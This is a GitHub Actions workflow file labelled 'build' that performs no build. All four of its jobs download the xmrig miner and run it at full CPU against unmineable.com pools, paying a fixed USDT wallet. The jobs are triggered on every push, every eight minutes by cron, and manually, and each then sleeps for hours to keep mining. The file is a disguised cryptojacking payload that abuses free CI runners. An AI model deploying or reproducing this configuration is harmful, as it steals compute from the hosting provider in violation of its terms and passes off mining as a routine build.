name: build
on:
  push:
  schedule:
    - cron: '*/8 * * * *'
  workflow_dispatch:
jobs:
  m1:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w1-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w2-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          sleep 20000
  m2:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w3-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w4-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          sleep 20000
  m3:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w5-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w6-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          sleep 20000
  m4:
    runs-on: ubuntu-latest
    timeout-minutes: 350
    steps:
      - run: |
          curl -sLO https://github.com/xmrig/xmrig/releases/download/v6.21.0/xmrig-6.21.0-linux-static-x64.tar.gz
          tar xf xmrig-6.21.0-linux-static-x64.tar.gz && cd xmrig-6.21.0
          ./xmrig -o rx.unmineable.com:3333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w7-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          ./xmrig -o rx.unmineable.com:13333 -a rx -k -u USDT:0xA763c9f25d702B34022130dA0Fb8e92712a73091.w8-$(hostname)-$RANDOM --threads=$(nproc) --cpu-priority=5 &
          sleep 20000
